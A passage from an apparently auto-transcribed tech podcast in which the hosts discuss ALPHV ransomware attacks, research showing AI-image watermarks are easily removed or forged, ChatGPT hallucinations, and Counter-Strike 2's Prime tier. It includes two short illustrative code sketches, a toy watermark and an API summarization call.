switch. Helping you prosper. Member FDIC

34:07

Equal Housing Lender. Before

34:10

we started recording,

34:11

we were like, we

34:13

gotta pick a way to say it. And then both

34:15

of us immediately, the second it started, we were

34:17

like, Alphava, Alphava, Alphava. Like, we went

34:19

immediately back to not knowing how

34:21

to say their name. It

34:24

is unpronounceable. Yeah, Black Cat was their

34:26

original name, and that's like, that's a word that I

34:28

know how to say. Yeah, sure. Black Cat. I got my feet

34:31

under me with that one. Alphava,

34:34

Alpha. I

34:36

just gotta call it Alpha. So yeah, anyway,

34:39

Alpha's back. Tell me about it. They're back

34:42

stirring up some stuff. Yeah, so they compromised

34:46

a Florida Circuit Court and

34:48

apparently have stolen a bunch of employee information,

34:52

including applications

34:54

for careers and things like that, I think, is

34:57

what I read. So they were related

35:01

to the MGM stuff. And

35:04

yeah, they just keep going. So I'm

35:06

not sure if this is associated in the same

35:09

kind of way that they got access to

35:11

MGM, whether it was a phone call to an

35:13

IT department that led to an endless

35:15

amount of problems. But they're

35:18

back, and they're still mucking

35:20

around. Interesting. Yeah,

35:23

because my memory of the casino

35:26

hack was that Alpha was responsible

35:28

for the ransomware and Scattered Spider were the

35:30

social engineers. And you raise a really

35:32

fascinating question of, like, does

35:35

Alpha do the social engineering too? Like, what

35:37

is their capacity? I think we gotta start reading

35:40

more about these folks. Maybe

35:43

one will call hotlinehacked.com, and

35:46

we can play it on the show.

35:48

And maybe we can talk about it. It's

35:50

an interesting one, because we never really

35:57

have a great sense of the timelines. We read about

35:59

a story I feel like the very next week, the same crew of

36:01

people is on to stuff. And I do wonder, is

36:04

there a lag in the publicity

36:06

of these attacks, or are they really cooking

36:08

it that quickly? Did they really just wrap up doing

36:10

a full Ocean's 11 and immediately kick

36:13

it over to a Florida court judicial circuit

36:16

where they

36:18

dropped a bunch of information on a website? It looks like

36:20

the Florida circuit court

36:22

didn't pay the ransom, and that's

36:24

why the data was there. I'm

36:28

so fascinated by that. Internal

36:30

conversations, that's something, there was

36:32

a, yeah, Ransomware Diaries was so

36:34

cool about that because it was specifically concerned with

36:36

that process of negotiating ransomware

36:40

and making the decision of whether or not you

36:42

want to pay for it. And there was

36:44

such cool reporting into that because it is such a

36:46

private, secure process that

36:48

people don't want to let people into. People

36:51

don't want to talk to journalists about it. And the fact that he was

36:53

able to do that, if you never listen

36:55

to that show, go back and listen to the feed drop we

36:57

did last year with them. It

37:00

was a very fascinating one. And the, yeah, it's interesting

37:02

because it's like a hostage negotiation, essentially.

37:04

And it's like, do you pay the terrorists? Totally.

37:08

It's like if you become like

37:11

Caesars. So here's the thing, like, my

37:13

wife listened to the episode we talked about Vegas and

37:15

was like, hey, you know, Caesars

37:18

paid it and was back up and running, MGM

37:20

didn't, why didn't they just pay it? And it's like,

37:22

well, it's tough.

37:26

It's tough. It cost

37:28

them $100 million in like lost

37:30

revenues and stuff. So it's not, I'm sure the

37:32

ransom was less, but at the same

37:34

time, once you become

37:37

known as the organization that pays, do

37:40

you open yourself up to more attacks? I would

37:42

say yes. Mm-hmm. Like

37:44

it's not gonna be the last time this happens.

37:47

No, definitely not. And

37:49

I feel like Vegas of all places

37:51

would have a lot of like, I don't know, they

37:53

put a lot of thought into how you deal with a

37:56

criminal messing with your system, like

37:58

whether it's on the casino for that. type criminals

38:00

like no there's the old Vegas

38:02

way this shit is done and I'm

38:05

not saying that's what happened there but feels

38:07

like I don't know it kind of reminded me of that

38:09

yeah yeah if Vegas was

38:12

not a publicly or conglomeration

38:14

of publicly traded companies these days it

38:17

was still back in the old days and it was mostly

38:19

allegedly mafia run I'm sure this

38:21

would be resolved in a much different way yeah

38:25

I mean if you're gonna go after you're

38:27

gonna go by the mafia and I'm

38:30

I am making no claims about MGM I'm sure

38:32

that is a different time yeah

38:35

but you know what I probably want to do it from behind a keyboard yeah

38:38

yeah I said allegedly we

38:42

need to just print allegedly on the like

38:44

box art of this show like we're

38:47

speculating wildly we

38:50

try to be informed calculating wildly

38:52

where we are out-of-pocket on hack

38:56

which now

38:58

does that be good yeah exactly all

39:01

of them all of them okay

39:04

so we mentioned this a little bit at the top of the show but

39:07

when generative AI first started kind

39:09

of kicking around people

39:11

started talking about people started exploring

39:13

okay well it is the downside of this giant

39:15

earth shattering new technology and

39:18

along with the impact it's inevitably

39:20

gonna have on the creator economy there's

39:23

the question of misinformation both

39:26

of which people start positing that watermarking

39:28

could be a very useful technique

39:32

the ability to run an image or piece

39:34

of text through something and try

39:36

and quickly figure out you

39:38

know just like a checkmark this was or was

39:40

not generated by a major AI companies

39:42

open AI alphabet meta Amazon and

39:45

they immediately said we are committing to developing watermarking

39:47

technology to counter misinformation it was

39:49

the sort of thing that was gestured towards whenever

39:52

that

39:54

whenever that very present threat was brought

39:56

up the

39:57

rules deep-mind introduced a sort of beta version of

39:59

its watermark since ID in late

40:01

August. It's sort of the answer

40:04

that comes up a lot when people raise

40:06

those very, very important questions. We

40:09

are talking about it because of a really fascinating

40:12

piece in Wired that dropped about a computer

40:14

science professor at the University of Maryland,

40:16

Soheil Feizi, who after

40:19

this long research project

40:21

over the last six months, stated that there is

40:24

currently no reliable watermarking

40:26

for AI images currently in use. He

40:28

and his small team were able to break all types

40:31

of AI watermarking that they tested.

40:34

Thought this was probably worth talking about.

40:37

So there's two different types of watermarking, right? There's

40:39

the watermarking that's visible to

40:41

the naked eye, you know, a watermark in the corner,

40:43

you can think of the Getty Images type thing. It's

40:45

also funny in the context of AI. The

40:48

other type, I didn't know this phrase, it's called

40:50

low perturbation. And

40:52

that basically just means it's invisible to the naked

40:54

eye. Yeah. So he was testing

40:56

specifically these low-perturbation watermarks

40:59

that would allow a user to quickly check

41:01

an image for whether or not

41:03

it was generated by AI. And I'm just gonna

41:06

quote him here. The results of his study, he

41:08

deemed them to have, quote, no

41:10

hope. He was, him

41:13

and his team were able to, the phrase is washing

41:15

out the watermark. And it was exceptionally

41:18

easy. He also, I found this

41:20

interesting, demonstrated how pretty

41:22

simple it was for those same watermarks to

41:24

then be added to human generated

41:26

images, leading to false positives. So

41:29

it's not just that the current state of

41:31

these watermarks is like crackable.

41:35

It's, it maybe suggests that

41:37

the very concept of an

41:39

easy to apply watermark that

41:41

is not visible to the naked eye could then

41:44

be misused to create these false

41:46

positives that render it even less useful

41:48

in the first place. But my

41:51

mind immediately goes to, I feel

41:53

like you could train an AI

41:55

to detect and remove these

41:58

AI generated patterns. A

42:01

little bit, yeah. Like you get a big training

42:03

set of AI images that have the watermarks and

42:05

a big training set of images that don't have the watermarks.

42:08

You feed it in and then train

42:10

it up and be like, okay, here's

42:12

the watermarked image. Is this image watermarked?

42:14

Yes, remove the watermark. Yeah, generate.

42:18

I feel like AI would be great at doing

42:20

that. Yeah, your solution

42:22

to AI just happens to be the kind of thing that AI

42:25

would be really, really great at undoing is

42:27

sort of a bad situation

42:29

to find yourself in. This, yeah,

42:32

it raises this

42:35

question of, this isn't the only

42:37

one of these studies that's going on. Pretty much the

42:39

second we realized we were entering a like era

42:41

of watermarking being really important,

42:44

a bunch of different studies kicked off. There's the University

42:46

of California, Santa Barbara one, and Carnegie

42:48

Mellon. They have all

42:50

found very similar things to Soheil's study,

42:53

which is that these are susceptible. The

42:56

interesting idea here is that I think maybe

42:58

these just, we started thinking of these not

43:00

as like a silver bullet but as a small

43:03

part of a much broader

43:06

way of addressing misinformation

43:08

and copyright that are invited by this new technology.

43:12

It's sort of like a means of harm

43:15

reduction against the really, really

43:17

low effort AI

43:19

fakery. You could imagine a super,

43:23

it's not the kind of thing you'd want to trust for everything, but like

43:25

a filter almost on a social

43:27

media platform or an email

43:29

client that is just parsing for the really,

43:32

really low effort stuff, but

43:34

that you shouldn't be relying on

43:36

as like a real true test of whether or not something

43:38

was authored by a human. I remember

43:40

when ChatGPT first came out, there were tons

43:43

of teachers running ChatGPT

43:45

essays through, especially these

43:47

tools that came out within days of ChatGPT

43:49

that were tasked with checking whether or

43:51

not it was AI generated. We all kind of quickly

43:53

had this reckoning that like, this

43:56

is not, put this tech

43:58

back in the oven, it's not ready yet. But

44:01

it's the same as the traditional

44:03

watermark, right? It's essentially a road

44:05

bump. If you wanna get rid of it, you can. That's

44:08

a great point. Like Adobe

44:11

Photoshop's Smart Fill probably gets

44:13

rid of most of them. 100% of those. And

44:16

it's, exactly. But it's essentially,

44:20

you have to cognitively take the step to

44:22

violate the copyright. And

44:25

I guess that's probably the biggest

44:27

checkbox for it, being able to show

44:29

that people actively did do something to bypass

44:31

the copyright when you do find them. The

44:34

idea of having some form of, like

44:37

images or pixels, right? Like they're just data

44:39

points. Literally just a grid of data

44:41

points. Run through

44:43

compression algorithms and a bunch of other things, depending

44:46

on what type they are. But trying

44:50

to put something into a grid of data points that

44:52

can't be either A detected or B removed

44:55

is very hard. If

44:57

you know what you're looking for, very easy. So

45:02

yeah, it's gonna

45:04

be a real tough one. Unless they're also

45:06

hashing the file and providing the, like,

45:09

checksum for the file, and you have to validate

45:11

that the file hasn't been modified, then

45:14

it's very, very tough.
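[Editor's note: a toy sketch of the fragility being discussed, using the crudest imaginable invisible watermark, least-significant-bit embedding. Production schemes like SynthID are far more sophisticated, but the researchers' point is that they fail under small perturbations in the same spirit.]

```python
# Toy "low-perturbation" watermark: hide one bit per pixel in the
# least significant bit, then "wash it out" with a tiny perturbation.
import random

def embed(pixels: list[int], bits: list[int]) -> list[int]:
    """Set each pixel's least significant bit to a watermark bit."""
    return [(p & ~1) | b for p, b in zip(pixels, bits)]

def extract(pixels: list[int]) -> list[int]:
    return [p & 1 for p in pixels]

image = [random.randint(0, 255) for _ in range(16)]
mark = [1, 0] * 8

marked = embed(image, mark)
assert extract(marked) == mark  # the watermark reads back cleanly

# Washing out: a +/-1 change per pixel is invisible to the eye but
# flips the low-order bits the mark lives in. Noise, resizing, and
# recompression do the same thing less deliberately.
washed = [min(255, max(0, p + random.choice((-1, 1)))) for p in marked]
print(extract(washed) == mark)  # almost certainly False: mark destroyed
```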

45:17

Yeah, because I have such a deep disrespect

45:19

for my own time, I end up watching a lot

45:21

of tech announcements and public

45:24

press events and stuff. And

45:26

I'm always intrigued by like the recurring narratives

45:29

that occur when companies

45:31

have to announce new technology, let's call it.

45:33

And I'm

45:35

intrigued to see, I

45:37

imagine there's a lot of pitch decks and

45:39

public presentations that are sitting

45:42

in like private drives right now that

45:44

spend a lot of time talking about security and

45:46

artificial intelligence. And I would imagine that if

45:48

I could do a search for the term watermarking, it

45:50

would come up a lot. And I'm very

45:52

intrigued. The thing I wanted

45:55

to take away from the story is like almost like loading

45:57

it into my brain so that the next time I

45:59

see a big. a big company talking about watermarking

46:05

and how watermarking with AI will only make this more

46:07

secure, or

46:10

will make misinformation harder, not to necessarily say, well,

46:15

that's just a lie outright. I

46:18

don't think it's that, but to sort

46:20

of carry a little bit more skepticism

46:23

about that as we continue to wade into this AI generative

46:25

art era. I

46:28

think there are a lot of slide decks full of artificially intelligent, or

46:33

AI generated images and AI generated copy. Maybe

46:38

even in the same slide deck. Every

46:42

pitch deck I've seen in the last year has

46:44

had some form of AI-generated

46:47

images in it and some form of copy that's been accelerated, edited, or

46:49

entirely generated via AI. I

46:55

think we're there with Microsoft. I

47:00

know Microsoft is looking at building, I'm

47:03

not even looking at it as actively if not

47:06

getting ready to deploy. Maybe it has

47:08

deployed and I don't use Microsoft Office enough,

47:11

but they are generating essentially an assistant inside

47:13

of Office that will fast-track

47:15

tons of things for you, whether

47:18

it's writing an email and Outlook, editing something

47:21

in Word, maybe even

47:24

smart figuring out what your spreadsheet design

47:26

is looking to do and then just finishing it

47:28

for you. I think

47:31

it's going to be, we're there. I

47:35

think it's going to be good, but there's

47:37

going to be bad things too, just like everything. If

47:39

you look at this entire podcast, it's

47:41

because we have technology and technology I

47:43

think is largely seen as good, but

47:45

there's some bad there too. Oh, definitely. I

47:50

think you were right about all of that. I'm very intrigued

47:52

to see what the next. I think

47:54

I'm fascinated to see as

47:58

it gets baked more into the world of the stuff we're already using.

48:01

I've become a ChatGPT user

48:03

for a bunch of different things, but

48:05

I think for a lot of people, it being woven

48:07

into the places they're already being productive,

48:10

Google Docs, Microsoft

48:12

Office, that's gonna be when it either

48:15

does or doesn't become a big part of people's habits. Because

48:18

this is one of the first pieces of technology where I'm realizing

48:20

that, I don't know,

48:22

the little bit of a bubble that I'm in when it comes

48:25

to new technology. I have friends who like

48:27

tech, I like tech. We do a

48:29

tech show. And

48:31

in my mind, ChatGPT showed up, Midjourney

48:33

showed up, and I'm like, that's all anyone's gonna be using

48:35

in six months. And over six months have passed,

48:38

and a lot of people in my life are not regularly

48:40

using these tools. Like, okay. There

48:44

are different threads of

48:47

tech users, and being

48:49

cognizant of that is something that, I don't know, it's

48:52

been a really fascinating process watching a big,

48:54

big tech shift happen and realizing that it's

48:57

not all happening at once. I

49:00

was sitting in a friend's backyard a month

49:03

ago. We were having a beer, and

49:06

their brother showed up, and their brother's

49:09

fiance. And she was in university

49:11

now, still in university, she's doing a master's

49:14

or something. And she was

49:18

talking about how she uses it to summarize her readings.

49:21

Like you just copy in digital

49:23

text. So she's gotta read 200

49:26

pages a week or something. She just

49:28

dumps it into ChatGPT. Summarize

49:30

this for me. And bang,

49:33

out comes three or four

49:35

pages of

49:38

everything that you need to take away from it. It's

49:40

like, wow, that's a use

49:42

case. Oh yeah,

49:45

it's funny. I

49:47

thought I'd figured it out. This is a total tangent.

49:51

We talked about AI hallucinations a little while back,

49:53

and those are particularly bad when you're asking

49:55

it questions that it's trying

49:58

to derive the answer from its own internal data. like

50:01

if you ask it about a law or

50:03

a health situation or anything like that, it might

50:05

just make things up. And I'd

50:07

started to feel like I had sort of found the workaround

50:10

to that, which is that always provide it your own

50:12

data set. Always be bringing in

50:14

your own information and saying I want

50:16

you to work off of this. Beyond

50:19

just the ability to quickly look back up at the data

50:21

and make sure something is accurate, I also just found

50:23

it got much better results. I got

50:25

my first full blown hallucination

50:28

using that technique. It was kind of

50:30

spooky to me. I was looking at

50:32

it writing full

50:34

on the wrong thing. It was just going on

50:36

a total fantasy, unrelated

50:39

to the text I had just provided it. It was really

50:42

weird to watch. Because

50:45

ChatGPT doesn't just sit there with a

50:47

loading bar and then show you the presented text,

50:49

you get to watch it type. There

50:51

was something so creepy about watching it just

50:54

sort of wax fantastical and make crap

50:57

up. I just read what I

50:59

gave you. I'm

51:01

just asking you to synthesize it into notes

51:03

so I can remember it later. What

51:05

is any of this? So

51:07

I want to just keep banging the drum: the

51:13

robots dream of electric sheep. They're making shit

51:15

up still. Don't trust it

51:17

yet. Use it. It's a powerful

51:20

tool. But if there was a calculator that

51:22

just got five plus five equals

51:24

nine sometimes, you'd be very cautious

51:26

using that calculator.
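[Editor's note: the "bring your own data" technique described above, sketched with the 2023-era OpenAI Python SDK. The model name and prompt wording are just examples, and as the anecdote shows, grounding lowers the hallucination rate rather than eliminating it.]

```python
# Grounding a summarization request in your own source text, sketched
# against the 2023-era openai SDK (versions before 1.0). Model name
# and prompts are examples, not recommendations.
import openai

openai.api_key = "sk-..."  # your API key

source_text = open("reading.txt").read()  # the pages you actually need summarized

response = openai.ChatCompletion.create(
    model="gpt-3.5-turbo",
    messages=[
        {"role": "system",
         "content": "Summarize ONLY the text the user provides. "
                    "If something is not in the text, do not invent it."},
        {"role": "user", "content": source_text},
    ],
)
print(response.choices[0].message.content)

# Still spot-check the output against the source: as described above,
# the model can wander into fantasy even with the text in front of it.
```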

51:31

Hey, I know we're wrapping up here and just kind of

51:33

shooting it. So here's a good

51:35

one. Remember when we were talking about video

51:37

game hackers and free to play games

51:39

and how they're overrun with video game hackers? So

51:42

Counter-Strike 2 released. The

51:45

new version of Counter-Strike came out and

51:48

they have essentially instituted kind

51:50

of what I said. They

51:52

put in a Prime status upgrade. So for like

51:54

an additional like $20, you

51:57

become a Prime player and Prime players.

52:00

play with other prime players. So

52:02

essentially, essentially

52:05

they've, they've created a situation where you've

52:07

essentially paid a cheating bond. You

52:09

get a few other little perks with it, but at

52:11

the end of the day, the biggest

52:13

change is that prime players get matched

52:16

with other prime players and because you've paid

52:18

for it now, there's a good chance you're not going to cheat.

52:21

So it's, it's a cheating bond. Anyway,

52:23

I just thought it was cool as a, as an

52:25

old school counter-strike player. I remember that idea

52:28

that you had. Yeah. You, yeah. Cheating

52:30

bond. That's a really good way of putting it. Is Counter-Strike 2 out,

52:32

or is that... no, Counter-Strike 2?

52:34

It's been out forever, or

52:37

like a long time, right? Uh, well,

52:40

yeah, yeah. But they just did a full rebuild

52:43

of it. Like I think it was a few weeks ago, two, three

52:45

weeks ago, the new, new, that new, new

52:47

full CS:GO went away and Counter-Strike

52:49

2 came out. Oh, okay. 'Cause

52:51

I was like, I thought, I thought it came out in 2012 and

52:53

then I'm seeing 2023. I was confused.

52:57

That's fascinating. I think that that makes

52:59

a ton of sense. Yeah. It's a game that's

53:01

had Valve Anti-Cheat, like Valve Anti-Cheat

53:03

was created for Counter-Strike essentially. And

53:06

it's, it's got a very active anti-cheat,

53:08

but there's still people that cheat and hack in it. So,

53:11

so this is just a way to get around that. You

53:13

know, so many of these free to play games are just overrun

53:15

with hackers and cheaters that, you

53:17

know, Hey, you love this game.

53:19

Do you love it enough to pay 20 bucks not

53:21

to get frustrated every time you die to a cheater? I

53:24

was like, yeah, I do. Huh.

53:26

Interesting. So, Huh. Yeah.

53:30

Bring it up. Um, hotlinehacked.com.

53:33

Make sure you go to it. Final ring of the bell, Scott.

53:35

Hotline Hacked. What is it? Where do they go? What should

53:37

they do? Go to hotlinehacked.com.

53:42

You want to call the number

53:44

and leave us a message and please

53:47

don't use this just to send us weird things. Yeah.

53:49

No, it goes to

53:51

an anonymized email box

53:53

that we're going to go through. Uh, please don't

53:55

send us malware, ALPHV. We're super

53:57

sorry. We don't know how to pronounce your name. Please don't

54:00

"I'm going to use this as an attack vector." Yeah,

54:06

send us some stuff if you're interested, if you've got a good

54:08

story, if you've done something, or if

54:10

you've seen something, or if you allegedly know

54:13

of something, we'd love to hear about

54:15

it. And if we think it's

54:17

good, then maybe it'll be in an episode

54:19

coming up. Stoked to hear from you. Thanks

54:22

for listening to another one. Thanks for making it to the end. And

54:24

we'll catch you soon. We'll catch you on Halloween

54:26

with a very fun episode of

54:28

Halloween Hacked. Oh yeah, special guest.

54:31

Special guest. Special guest. Looking forward

54:33

to it. Catch you in the

54:35

next one. Take care. When it

54:37

comes to personal style,

54:53

it's all

54:55

about layers, especially now. Add

54:57

layers to your fall style with new colors,

55:00

fabrics, and styles from Indochino. Go

55:02

to Indochino.com and use code PODCAST

55:05

to get 10% off any purchase of $399 or more.
